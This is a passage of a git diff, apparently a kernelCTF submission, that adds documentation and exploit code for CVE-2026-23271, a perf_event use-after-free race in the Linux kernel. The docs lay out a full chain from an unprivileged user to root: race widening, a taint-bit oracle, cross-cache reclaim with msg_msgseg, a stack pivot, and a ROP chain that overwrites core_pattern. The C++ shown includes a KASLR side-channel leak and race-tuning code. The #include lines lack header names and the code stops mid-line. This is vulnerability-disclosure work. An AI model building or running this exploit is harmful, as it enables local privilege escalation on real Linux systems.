diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md new file mode 100644 index 000000000..b44c240ff --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md @@ -0,0 +1,149 @@ +# Exploit + +## Exploit Primitives + +- **Vulnerable object**: `perf_event` (`perf_event_cache` slab, 0x520 bytes) +- **Primitive chain**: Race condition → time-limited UAF → stable UAF → cross-cache attack → reclaim with `msg_msgseg` → fake `perf_event` with controlled `destroy` pointer → stack pivot → ROP `core_pattern` overwrite + +## Vulnerability Overview + +There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`. + +When a perf_event with `sigtrap=1` overflows, the kernel calls `task_work_add()` inside `__perf_event_overflow()` to schedule `perf_pending_task` for SIGTRAP delivery on return to userspace. If `perf_release()` runs concurrently on another thread and calls `_free_event()` → `call_rcu(free_event_rcu)` while the task_work is still queued, the `perf_event` is RCU-freed but the task_work still holds a reference to it. The subsequent `perf_pending_task` execution accesses the freed object, producing a UAF. + +The kernel detects this as a WARNING at the `WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount))` check in `__perf_event_overflow()`, setting the taint bit — which the exploit uses as a reliable oracle to detect when the race has been won. + +## Race Timing Diagram + +Three threads cooperate to trigger, widen, and stabilize the race: + +- **Thread 1 (Worker, CPU 0)**: Creates the tracepoint perf\_event A, triggers overflow via `futex_wait` syscall entry, then blocks in the futex to widen the race window. +- **Thread 2 (Closer, CPU 1)**: Closes the perf\_event fd to free event A via RCU, then detects the WARN and opens the spray gate. +- **Thread 3 (Spray, CPU 0)**: Heap-sprays event B into event A's freed slot before `perf_pending_task` runs. 
+ +``` + Thread 1 (Worker, CPU 0) Thread 2 (Closer, CPU 1) Thread 3 (Spray, CPU 0) + ======================== ========================= ======================== + + [1] perf_event_open(type=TRACEPOINT, + config=577 /* sys_enter_futex */, + sigtrap=1, sample_period=1) + [a] close(perf_event_fd) + [2] futex_wait(&futex_word, 0) | + (futex_word is a userspace global, + initially 0; expected_val=0) + | v + | (syscall entry) perf_event_release_kernel + v | + syscall_trace_enter | + perf_syscall_enter | + perf_trace_buf_submit | + perf_tp_event | + for_each_event: | + event A found on list ···> [b] perf_remove_from_context + (event A still on list (removes event A from list, + at this point) but Thread 1 already holds + a reference to it) + perf_swevent_event [c] put_event + (240-term filter atomic_long_dec_and_test + evaluation → refcount = 0 + widens race window) | + __perf_event_overflow v + _free_event + [3] task_work_add(current, __free_event + &event->pending_task, call_rcu(&event->rcu_head, + TWA_RESUME) free_event_rcu) + WARN_ON_ONCE( | + !atomic_long_inc_not_zero( | + &event->refcount)) | + WARNING fires | + | [d] detect WARNING + | poll /proc/sys/kernel/tainted + | to check if taint bit set + | + v + do_futex → futex_wait_setup → + enters wait queue, calls schedule() + | [A] RCU grace period completes + | (free_event_rcu executes, + | event A returned to slab) + | spray: perf_event_open() + | → event B allocated in + | event A's freed slot + | + v + [5] futex_wait returns to userspace + resume_user_mode_work + task_work_run + perf_pending_task ← UAF + put_event(event) + 'event' now points to event B + → event B refcount decremented to 0 + → event B freed via RCU + → userspace still holds FD to event B + → DANGLING FD (stable, reusable UAF) +``` + +## Exploitation + +### Race Constraints (all must hold for successful exploitation) + +1. 
**Thread 1 `perf_tp_event` before Thread 2 `perf_remove_from_context`**: The tracepoint handler must find event A on the event list before the closer removes it. + +2. **Thread 2 `put_event` before Thread 1 `WARN_ON_ONCE`**: Event A's refcount must reach 0 (via `put_event`) before `__perf_event_overflow` tries `atomic_long_inc_not_zero`. If refcount > 0, the increment succeeds silently and no UAF occurs. The 240-term filter expression widens this window by increasing `filter_match_preds` execution time. + +3. **`free_event_rcu` before Thread 1 `perf_pending_task`**: Event A must be returned to the slab (via RCU callback) before `perf_pending_task` accesses it. The exploit ensures this by: (a) having the worker block in `futex_wait` to trigger an RCU quiescent state, and (b) forcing an RCU grace period from userspace with `membarrier(MEMBARRIER_CMD_GLOBAL)`, which runs `synchronize_rcu()` inside the kernel. + +4. **Thread 3 spray before Thread 1 `perf_pending_task`**: Event B must occupy event A's freed slot before `perf_pending_task` runs `put_event`. The exploit achieves this by keeping the worker blocked in `futex_wait` until the event B spray has completed, then waking it via `FUTEX_WAKE`. + +### From Transient WARNING to Stable Dangling FD + +The exploit converts a narrow, non-deterministic race into a stable UAF primitive in three stages: + +1. **Transient race → WARNING**: The race between `__perf_event_overflow()` and `perf_remove_from_context()` is inherently narrow (~microseconds). The 240-term filter expression and `futex_wait` blocking widen it. When the race succeeds, the kernel fires a WARNING via `__warn()`, which calls `add_taint(TAINT_WARN)` after printk completes. The exploit detects this via `/proc/sys/kernel/tainted` polling or a wake-failure heuristic. + +2. **WARNING → Spray reclaim**: After detecting the race win, the exploit opens the spray gate. Multiple pre-created threads create new perf\_events to reclaim event A's freed slab slot. One of these (event B) occupies event A's slot. + +3. 
**Spray reclaim → Dangling FD**: When `perf_pending_task` runs as task\_work on the worker's return to userspace, it calls `put_event(event)` on what it believes is event A — but the memory now belongs to event B. This decrements event B's refcount to 0, triggering `_free_event` on event B. However, the spray thread still holds an open FD to event B. This FD is now a **dangling pointer** — it references freed memory that can be reclaimed by arbitrary kernel objects (e.g., `msg_msgseg` via cross-cache attack), enabling controlled read/write and ultimately ROP. + +### From Dangling FD to Controlled Memory + +The exploit converts the dangling FD for event B into attacker-controlled memory in three steps: + +1. **Spray & locate victim**: Spray perf\_events (event B) to reclaim event A's freed slab slot, then probe with additional events (event C) one at a time. Each perf\_event has a unique kernel-assigned ID (monotonically increasing), readable via `ioctl(PERF_EVENT_IOC_ID)`. Before probing, the exploit records every event B FD's original ID. After each event C allocation, it re-reads all event B IDs — if an event B FD's ID has changed from its recorded value, it means event C landed in the same memory and overwrote that slot. This event B FD is now the `victim_perf_fd`. +2. **Cross-cache attack**: Free all perf\_events in the victim's slab region, flush them from the SLUB `cpu_partial` list, and return the empty slab pages to the buddy system. +3. **`msg_msgseg` reclaim**: Spray `msg_msgseg` objects (via `msgsnd`) to reclaim the freed buddy pages. The `victim_perf_fd` now points to attacker-controlled `msg_msgseg` memory. + +### ID Oracle (Victim Identification) + +The exploit needs to determine which `msg_msgseg` overlaps the freed `perf_event` and at what offset. It uses a two-stage approach: + +**Stage 1 — Probe payload**: Each `msg_msgseg` is filled with a unique stamp pattern: `(msg_idx << 32) | buffer_offset` at every 8-byte position. 
Critical fields (`ctx`, `parent`) are patched to valid values (`core_pattern` address, 0) to prevent kernel crashes if a close happens on the reclaimed event. + +**Stage 2 — Oracle read**: The exploit calls `ioctl(PERF_EVENT_IOC_ID)` on `victim_perf_fd`. Since the underlying memory is now a `msg_msgseg`, the `event->id` field contains the stamp pattern. From this, the exploit extracts: +- The victim `msg_queue_ids` index (`id_val >> 32`) +- The exact byte offset of the event within the segment (`id_val & 0xFFFFFFFF`) + +### ROP and Privilege Escalation + +With the victim segment and offset known, the exploit builds a fake `perf_event` payload with safety fields (NULL out `ctx`, `rb`, `prog`, `cgrp`, `addr_filters` to skip cleanup paths; set `refcount=1` so `_free_event` triggers) and a `destroy` pointer set to a stack pivot gadget (`push rbx; pop rsp; pop rbp; ret`). The ROP chain at event+0x8 calls `_copy_from_user` to overwrite the kernel's `core_pattern` with `|/proc/%P/fd/666 %P`, then calls `msleep` to freeze the kernel thread. + +Since a `perf_event` (0x520 bytes) is larger than a single `msg_msgseg` (0x400 bytes), the fake event payload inevitably spans two adjacent segments. The exploit handles this by spraying a "universal neighbor payload" into segments adjacent to the victim (window +/-16), overlaying both prev-segment and next-segment positions so the payload is valid regardless of which neighbor contains the other half. The victim segment itself is then sprayed with the exact-offset payload. Closing `victim_perf_fd` triggers `perf_release()` → `_free_event()` → `event->destroy(event)` → stack pivot → ROP chain execution. + +A previously forked child process polls `/proc/sys/kernel/core_pattern`. Once overwritten, it crashes via NULL dereference, causing the kernel to execute the exploit binary as root (via fd 666 `memfd`). The binary uses `pidfd_open` + `pidfd_getfd` to steal the parent's stdio FDs and runs `cat /flag`. 
+ +### KASLR Leak (Prefetch Side-Channel) + +To bypass KASLR, the exploit uses the prefetch side-channel [technique](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md#kaslr-bypass) described in an earlier kernelCTF submission. + +In the CI environment, `leak_kaslr_base` from libxdk is used. For manual testing on remote VMs, a separate Intel-optimized variant (`bypass_kaslr`) is selected. + +## kernelXDK Integration + +The exploit uses [kernelXDK](https://github.com/google/kernel-research) (libxdk) to decouple target-specific information from the exploit logic: + +- **Target detection**: `TargetDb` + `AutoDetectTarget()` identifies the running kernel +- **Symbol resolution**: `GetSymbolOffset()` for `msleep`, `_copy_from_user`, `core_pattern`, and ROP gadgets +- **Structure offsets**: `GetFieldOffset()` for `perf_event` fields (`destroy`, `ctx`, `rb`, `pmu`, `refcount`, etc.) +- **ROP chain construction**: `RopChain::Add()` with KASLR-adjusted addresses +- **KASLR bypass**: `leak_kaslr_base()` for CI environments diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md new file mode 100644 index 000000000..8639e78e4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md @@ -0,0 +1,30 @@ +# Vulnerability + +There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`. + +For software/tracepoint-driven perf events, overflow handling could run with only +preemption disabled (hard IRQs are not disabled). In that context, teardown paths such as +`perf_event_release_kernel()` -> `perf_remove_from_context()` could make progress +concurrently and invalidate callback-related event state still used by the overflow path +(for example `event->pending_task`), leading to a use-after-free. 
+ + +## Requirements to trigger the vulnerability + - Capabilities: None + - Kernel configuration: `CONFIG_PERF_EVENTS=y` + - User namespaces required: No + +## Commit which introduced the vulnerability + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=592903cdcbf6 + +## Commit which fixed the vulnerability + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae + +## Affected kernel versions + - 2.6.31-rc1 - 7.0-rc2 + +## Affected component, subsystem + - perf + +## Cause + - race condition diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile new file mode 100644 index 000000000..b4aa2293c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/Makefile @@ -0,0 +1,16 @@ +KERNELXDK_INCLUDE_DIR ?= /usr/local/include +KERNELXDK_LIB_DIR ?= /usr/lib + +CXXFLAGS = -O2 -Wall -static -pthread -I. 
-I$(KERNELXDK_INCLUDE_DIR) +LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK + +exploit: exploit.cpp target_db.kxdb + g++ $(CXXFLAGS) -o $@ $< $(LDFLAGS) + +target_db.kxdb: + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +clean: + rm -f exploit exploit_debug target_db.kxdb + +.PHONY: clean diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit new file mode 100755 index 000000000..703b9c45a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp new file mode 100644 index 000000000..1dd13511c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/exploit.cpp @@ -0,0 +1,2491 @@ +extern "C" { +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +} + +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +namespace { + +constexpr uint64_t KASLR_START = 0xFFFFFFFF81000000ULL; +constexpr uint64_t KASLR_END = KASLR_START + 0x40000000ULL; +constexpr uint64_t KASLR_SLOT_SIZE = 0x200000ULL; + +inline __attribute__((always_inline)) uint64_t rdtsc_begin_() { + uint64_t a, d; + asm volatile("mfence\n\t" "rdtscp\n\t" + "mov %%rdx, %0\n\t" "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" "lfence\n\t" + : "=r"(d), "=r"(a) :: "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} +inline __attribute__((always_inline)) uint64_t rdtsc_end_() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" "lfence\n\t" "rdtscp\n\t" + "mov %%rdx, %0\n\t" "mov %%rax, %1\n\t" 
"mfence\n\t" + : "=r"(d), "=r"(a) :: "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} +inline __attribute__((always_inline)) void prefetch_(uint64_t addr) { + asm volatile("prefetchnta (%0)\n\t" "prefetcht2 (%0)\n\t" : : "r"(addr)); +} +inline size_t sidechannel_(uint64_t addr) { + size_t t = rdtsc_begin_(); + prefetch_(addr); + return rdtsc_end_() - t; +} +inline uint64_t slot_to_addr_(size_t slot) { return KASLR_START + (slot * KASLR_SLOT_SIZE); } +inline uint64_t abs_diff_(uint64_t a, uint64_t b) { return a > b ? a - b : b - a; } +inline uint64_t compute_median_(std::vector v) { + size_t n = v.size() / 2; + std::nth_element(v.begin(), v.begin() + n, v.end()); + return v[n]; +} +inline std::optional try_find_edge_(const std::vector &timings, uint64_t window_size) { + if (timings.size() < window_size) return std::nullopt; + uint64_t median = compute_median_(timings); + uint64_t cur = 0; + for (size_t k = 0; k < window_size; k++) cur += abs_diff_(timings[k], median); + uint64_t best = cur; + std::optional best_slot = 0; + for (size_t i = 1; i <= timings.size() - window_size; i++) { + cur -= abs_diff_(timings[i - 1], median); + cur += abs_diff_(timings[i + window_size - 1], median); + if (cur > best) { best = cur; best_slot = i; } + } + return best_slot; +} +inline std::optional try_leak_kaslr_base_(uint64_t window_size, int samples) { + size_t slots = (KASLR_END - KASLR_START) / KASLR_SLOT_SIZE; + std::vector timings(slots, std::numeric_limits::max()); + for (int i = 0; i < samples; i++) + for (size_t s = 0; s < slots; s++) { + uint64_t t = sidechannel_(slot_to_addr_(s)); + if (t < timings[s]) timings[s] = t; + } + auto slot = try_find_edge_(timings, window_size); + if (slot) return slot_to_addr_(*slot); + return std::nullopt; +} +inline std::optional find_majority_(const std::vector> &slots) { + uint64_t cand = 0; size_t count = 0; + for (const auto &s : slots) { + if (count == 0) { if (s) { cand = *s; count = 1; } } + else if (s && *s == cand) count++; 
else count--; + } + size_t actual = 0; + for (const auto &s : slots) if (s && *s == cand) actual++; + if (actual > slots.size() / 2) return cand; + return std::nullopt; +} + +} // namespace + +static uint64_t leak_kaslr_base_local(uint64_t window_size, int samples, int trials) { + std::vector> cands; + for (int i = 0; i < trials; i++) cands.push_back(try_leak_kaslr_base_(window_size, samples)); + auto base = find_majority_(cands); + if (!base) throw ExpKitError("Failed to leak KASLR base"); + return *base; +} + +INCBIN(target_db, "target_db.kxdb"); +__asm__(".section .text\n"); + +#ifndef SYS_pidfd_getfd +#ifdef __NR_pidfd_getfd +#define SYS_pidfd_getfd __NR_pidfd_getfd +#else +#define SYS_pidfd_getfd 438 +#endif +#endif + +#define log_info(fmt, ...) dprintf(2, "[+] " fmt "\n", ##__VA_ARGS__) +#define log_warn(fmt, ...) dprintf(2, "[-] " fmt "\n", ##__VA_ARGS__) +#define log_dbg(fmt, ...) dprintf(2, "[*] " fmt "\n", ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + log_warn(fmt, ##__VA_ARGS__); \ + exit(1); \ + } while (0) + +#ifndef SPRAY_C_COUNT +#define SPRAY_C_COUNT 0x80 +#endif +#ifndef SPRAY_B_COUNT +#define SPRAY_B_COUNT 0x400 +#endif +#define DRAIN_COUNT (0x20) + +static int vuln_trigger_mode = 0; + +/* Fallback membarrier(2) command values and syscall number, used only when no macro of the same name is already defined; each guard must name the macro it defines. */ +#ifndef MEMBARRIER_CMD_GLOBAL +#define MEMBARRIER_CMD_GLOBAL (1 << 0) +#endif +#ifndef MEMBARRIER_CMD_REGISTER_PRIVATE_EXPEDITED +#define MEMBARRIER_CMD_REGISTER_PRIVATE_EXPEDITED (1 << 4) +#endif +#ifndef MEMBARRIER_CMD_PRIVATE_EXPEDITED +#define MEMBARRIER_CMD_PRIVATE_EXPEDITED (1 << 3) +#endif +#ifndef __NR_membarrier +#define __NR_membarrier 324 +#endif + +#define OBJS_PER_SLAB 12 +#define MIN_PARTIAL 5 +#define CPU_PARTIAL 24 +#define PADDINGS 11 +#define EMPTY_SLABS (MIN_PARTIAL + PADDINGS) +#define EVICT_SLABS 12 + + +#define TOTAL_OBJS ((EMPTY_SLABS + EVICT_SLABS) * OBJS_PER_SLAB) + + +#define PERF_EVENT_SIZE (0x520) +#define MSG_SPRAY_COUNT 0x180 +#define MSG_FAKE_A_COUNT 0x40 +#define MSG_FAKE_B_COUNT 0x20 +#define MSG_SEG_SIZE (0x400) +#define 
MSG_SEG_HEADER_SZ (8) +#define MSG_SEG_PAYLOAD_SIZE (MSG_SEG_SIZE - MSG_SEG_HEADER_SZ) +#define MSG_SPRAY_SIZE (PAGE_SIZE + MSG_SEG_PAYLOAD_SIZE) +#define MSG_HEADER_SZ 48 +#define MSG_MSG_PAYLOAD_SZ (PAGE_SIZE - MSG_HEADER_SZ) +#define MTEXT_SIZE (MSG_SEG_PAYLOAD_SIZE + MSG_MSG_PAYLOAD_SZ) + +#define MSG_COPY 040000 + +int target_perf_fd = 0; +uint64_t target_perf_id = 0; +int perf_fd_idx = -1; +int victim_perf_fd = -1; +int victim_perf_idx = -1; +uint64_t victim_perf_id = -1; +int spray_c_count = 0; + +static volatile int stop_threads = 0; +static volatile int exit_threads = 0; +static int spray_c_fds[SPRAY_C_COUNT]; +static int spray_b_fds[SPRAY_B_COUNT]; +static int total_fds[TOTAL_OBJS]; + +static uint64_t spray_b_ids[SPRAY_B_COUNT]; +static uint8_t spray_b_id_valid[SPRAY_B_COUNT]; +static int drain_fds[2*DRAIN_COUNT]; +int sync_pipe[2]; +int msg_queue_ids[MSG_SPRAY_COUNT]; +int msg_fake_ids[MSG_FAKE_A_COUNT + MSG_FAKE_B_COUNT]; + +__attribute__((constructor)) static void init_msg_ids() { + memset(msg_queue_ids, -1, sizeof(msg_queue_ids)); + memset(msg_fake_ids, -1, sizeof(msg_fake_ids)); +} + +static pid_t crash_child_pid = -1; + +/* ================================================================ + * New TP Code Start + * ================================================================ + */ + +#ifndef TRAP_PERF +#define TRAP_PERF 6 +#endif + +#ifndef __NR_perf_event_open +#define __NR_perf_event_open 298 +#endif + +#define TP_TAINT_WARN_MASK 512L + +/* v10 staged profiles: + * A: 577 0 0 1 4000 1 240 20 0 0 1 2000 0 (100ms prewake hold) + * B: 577 0 0 1 12000 1 240 20 0 0 1 2000 0 (160ms prewake hold) + */ +#define TP_FIXED_EVENT_ID 577 +#define TP_FIXED_DELAY_NS 0 +#define TP_FIXED_TRIES_PER_ROUND 4000 +#define TP_FIXED_MODE 1 +#define TP_FIXED_FILTER_TERMS 240 +#define TP_FIXED_FUTEX_TIMEOUT_MS 2000 +#define TP_FIXED_HOG_NS 0 +#define TP_FIXED_VERBOSE 0 +#define TP_FIXED_DRAIN_EVERY 1 +#define TP_FIXED_DRAIN_SLEEP_US 2000 +#define TP_FIXED_PRIME_EVERY 0 
+#define TP_FIXED_TARGET_SLOT_RCU_WAIT_US 2000 +#define TP_FIXED_WAKE_DELAY_NS 800000 +#define TP_FIXED_WAKE_ARM_SPINS 80000 +#define TP_FIXED_POST_CLOSE_GRACE_NS 100000 +#define TP_FIXED_WAKE_RETRY_COUNT 10 +#define TP_FIXED_WAKE_RETRY_GAP_NS 50000 +#define TP_FIXED_LATE_WAKE_GRACE_NS 800000 +#define TP_FIXED_WARN_HOLD_MAX_NS 30000000 +#define TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS 1000000 +#define TP_FIXED_WARN_WAKE_PREDELAY_NS 100000000 +#define TP_PROFILE_B_WARN_WAKE_PREDELAY_NS 160000000 +#define TP_PROFILE_B_TRIES_PER_ROUND 12000 +#define TP_FIXED_PREWAKE_TAINT_POLL_MAX_NS 20000000 +#define TP_FIXED_PREWAKE_TAINT_POLL_STEP_NS 100000 +#define TP_FIXED_LATE_TAINT_POLL_MAX_NS 50000000 +#define TP_FIXED_LATE_TAINT_POLL_STEP_NS 200000 +#define TP_FIXED_WARN_WAKE_EXTEND_MAX_NS 50000000 +#define TP_FIXED_WARN_WAKE_EXTEND_GAP_NS 100000 +#define TP_ORACLE_PASSES 10 +#define TP_ORACLE_PASS_GAP_US 500 +#define TP_BASELINE_POLL_US 200 +#define TP_BASELINE_WAIT_NS 50000000 +#define TP_BASELINE_MIN_VALID_IDS 64 +#define TP_SPRAY_PHASEA_COUNT 128 +#define TP_SPRAY_PHASEB_BASE_DELAY_NS 1000 +#define TP_SPRAY_PHASEB_STEP_NS 500 +#define TP_SPRAY_PHASEB_STEPS 64 +#define TP_SPRAY_FIRST_ALLOC_WAIT_NS 2000000 +#define TP_SPRAY_DONE_WAIT_NS 2000000000ULL +#define TP_GATE_RELEASE_DELAY_NS 70000000 +#define TP_MAX_ROUNDS 2 + +static volatile int tp_warn_hit = 0; +static volatile int tp_race_success = 0; +static volatile int tp_spray_gate = 0; /* 0=wait, 1=start, -1=abort */ +static volatile sig_atomic_t tp_sigtrap_count = 0; +static volatile uint64_t tp_last_sigtrap_ns = 0; +static volatile uint64_t tp_warn_gate_open_ns = 0; +static volatile uint64_t tp_first_spray_alloc_ns = 0; +static volatile int tp_first_spray_alloc_idx = -1; +static volatile int tp_spray_open_done = 0; +static volatile int tp_futex_word = 0; +static volatile int tp_perf_fd = -1; + +enum tp_fail_reason { + TP_FAIL_NONE = 0, + TP_FAIL_WARN_MISS = 1, + TP_FAIL_ORACLE_NO_VICTIM = 2, + TP_FAIL_ORACLE_BAD_INDEX = 3, + 
TP_FAIL_FINAL_FAILED = 4, +}; + +static volatile int tp_oracle_hit = 0; +static volatile int tp_victim_msg_idx = -1; +static volatile int tp_final_stage_entered = 0; +static volatile int tp_final_result = 0; +static volatile int tp_fail_reason = TP_FAIL_NONE; + +/* Keep template globals for compatibility with legacy helper code in this file. */ +static int g_event_id = TP_FIXED_EVENT_ID; +static int g_num_cpus = 1; + +/* Defined later in the legacy block; declared here for TP slot-drain helpers. */ +void user_synchronize_rcu(void); + +struct tp_run_cfg { + int event_id; + int delay_ns; + int tries_per_round; + int mode; + int filter_terms; + int futex_timeout_ms; + int hog_ns; + int verbose; + int drain_every_attempts; + int drain_sleep_us; + int prime_every_attempts; + int warn_wake_predelay_ns; + const char *profile_name; +}; + +struct tp_sched_cfg { + int worker_cpu; + int closer_cpu; + int worker_policy; + int worker_prio; + int closer_policy; + int closer_prio; + int hog_policy; + int hog_prio; +}; + +struct tp_attempt_ctx { + volatile int closer_ready; + volatile int hog_ready; + volatile int event_ready; + volatile int event_failed; + volatile int start_close; + volatile int wait_armed; + + int delay_ns; + int hog_ns; + int futex_timeout_ms; + int event_id; + const char *filter_expr; + struct tp_sched_cfg sched; + int verbose; + int do_prime; + int target_slot_idx; + + int futex_ret; + int futex_errno; + int sigtrap_before_wait; + int sigtrap_after_wait; + uint64_t t_before_futex_wait_ns; + uint64_t t_after_futex_wait_ns; + uint64_t t_last_sigtrap_ns; + uint64_t t_worker_write_ns; + uint64_t t_closer_close_ns; + uint64_t t_wake_ns; + int wake_ret; + int wake_errno; + int wake_final_ret; + int wake_final_errno; + int wake_calls; + int wake_hit_total; + int wake_store1_fallback; + int wake_warn_extend_used; + uint64_t wake_warn_extend_ns; + int late_taint_poll_reads; + int warn_seen_pre_wake; + int warn_seen_stage; /* 0=none,1=pre,2=late,3=speculative */ + int 
spray_gate_opened; + int spray_seen_pre_wake; + uint64_t warn_hold_ns; + uint64_t warn_wake_predelay_ns; + int warn_hold_applied; + uint64_t warn_hold_applied_ns; + int warn_wake_predelay_target_ns; + uint64_t first_warn_detect_ns; + uint64_t warn_detect_to_first_wake_ns; + int taint_poll_reads; + uint64_t taint_poll_ns; +}; + +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, + int cpu, int group_fd, unsigned long flags) +{ + return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); +} + +static long do_futex(volatile int *uaddr, int futex_op, int val, + const struct timespec *timeout, + volatile int *uaddr2, int val3) +{ + return syscall(SYS_futex, uaddr, futex_op, val, timeout, uaddr2, val3); +} + +static uint64_t get_time_ns(void) +{ + struct timespec ts; + + clock_gettime(CLOCK_MONOTONIC_RAW, &ts); + return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec; +} + +static void tp_spin_delay_ns(uint64_t delay_ns); +static void tp_cpu_relax_once(void); +static int tp_try_open_spray_gate(uint64_t gate_open_ns); + +static void tp_maybe_apply_warn_wake_hold(struct tp_attempt_ctx *ctx) +{ + uint64_t hold_start; + uint64_t target_ns; + + if (!ctx || !ctx->warn_seen_stage || ctx->warn_hold_applied) + return; + + target_ns = (ctx->warn_wake_predelay_target_ns > 0) ? 
+ (uint64_t)ctx->warn_wake_predelay_target_ns : 0ULL; + if (!target_ns) + return; + + hold_start = get_time_ns(); + tp_spin_delay_ns(target_ns); + ctx->warn_wake_predelay_ns = get_time_ns() - hold_start; + ctx->warn_hold_applied = 1; + ctx->warn_hold_applied_ns = ctx->warn_wake_predelay_ns; +} + +static void tp_warn_open_gate_and_wait_spray(struct tp_attempt_ctx *ctx, uint64_t hold_start_ns) +{ + if (!ctx) + return; + + if (tp_try_open_spray_gate(hold_start_ns)) + ctx->spray_gate_opened = 1; + + while ((get_time_ns() - hold_start_ns) < TP_FIXED_WARN_HOLD_MAX_NS) { + uint64_t first_alloc_ns = __atomic_load_n(&tp_first_spray_alloc_ns, __ATOMIC_ACQUIRE); + uint64_t elapsed_ns = get_time_ns() - hold_start_ns; + + if (first_alloc_ns > 0) { + ctx->spray_seen_pre_wake = 1; + if (elapsed_ns >= TP_FIXED_WARN_HOLD_AFTER_SPRAY_NS) + break; + } + + tp_cpu_relax_once(); + } +} + +static void tp_cpu_relax_once(void) +{ +#if defined(__x86_64__) || defined(__i386__) + __asm__ __volatile__("pause" ::: "memory"); +#else + __asm__ __volatile__("" ::: "memory"); +#endif +} + +static void tp_spin_delay_ns(uint64_t delay_ns) +{ + uint64_t start; + + if (!delay_ns) + return; + + start = get_time_ns(); + while ((get_time_ns() - start) < delay_ns) + tp_cpu_relax_once(); +} + +static void tp_set_thread_affinity(int cpu) +{ + cpu_set_t mask; + + if (cpu < 0) + return; + + CPU_ZERO(&mask); + CPU_SET(cpu, &mask); + (void)sched_setaffinity(0, sizeof(mask), &mask); +} + +static void tp_set_thread_sched_best_effort(const char *role, int policy, int prio, int verbose) +{ + struct sched_param sp; + int ret; + + if (policy == SCHED_OTHER) + return; + + memset(&sp, 0, sizeof(sp)); + sp.sched_priority = prio; + + ret = pthread_setschedparam(pthread_self(), policy, &sp); + if (ret == 0) + return; + + if (verbose) { + if (ret == EPERM || ret == EACCES) + log_warn("[sched] %s no RT permission (policy=%d prio=%d)", role, policy, prio); + else + log_warn("[sched] %s pthread_setschedparam failed: %s", role, 
strerror(ret)); + } +} + +static int tp_read_kernel_tainted(long *value_out) +{ + FILE *fp; + long v; + + if (!value_out) + return -1; + + fp = fopen("/proc/sys/kernel/tainted", "r"); + if (!fp) + return -1; + + if (fscanf(fp, "%ld", &v) != 1) { + fclose(fp); + return -1; + } + + fclose(fp); + *value_out = v; + return 0; +} + +static int tp_taint_warn_bit_set(long tainted) +{ + return ((tainted & TP_TAINT_WARN_MASK) != 0) ? 1 : 0; +} + +static int tp_try_open_spray_gate(uint64_t gate_open_ns) +{ + int expected = 0; + + if (__atomic_compare_exchange_n(&tp_spray_gate, &expected, 1, 0, + __ATOMIC_ACQ_REL, __ATOMIC_ACQUIRE)) { + __atomic_store_n(&tp_warn_gate_open_ns, gate_open_ns, __ATOMIC_RELEASE); + return 1; + } + + return 0; +} + +static void tp_user_membarrier_global(void) +{ + (void)syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); +} + +static void tp_maybe_low_freq_drain(const struct tp_run_cfg *cfg, unsigned long attempt_seq) +{ + struct timespec ts; + + if (!cfg || cfg->drain_every_attempts <= 0 || cfg->drain_sleep_us <= 0) + return; + + if (attempt_seq == 0 || (attempt_seq % (unsigned long)cfg->drain_every_attempts) != 0) + return; + + tp_user_membarrier_global(); + + ts.tv_sec = cfg->drain_sleep_us / 1000000; + ts.tv_nsec = (long)(cfg->drain_sleep_us % 1000000) * 1000L; + (void)nanosleep(&ts, NULL); + + tp_user_membarrier_global(); +} + +static void tp_sigtrap_handler(int sig, siginfo_t *info, void *ucontext) +{ + (void)sig; + (void)ucontext; + + tp_sigtrap_count++; + __atomic_store_n(&tp_last_sigtrap_ns, get_time_ns(), __ATOMIC_RELEASE); + if (!info || info->si_code != TRAP_PERF) + log_warn("[tp] unexpected SIGTRAP si_code=%d", info ? 
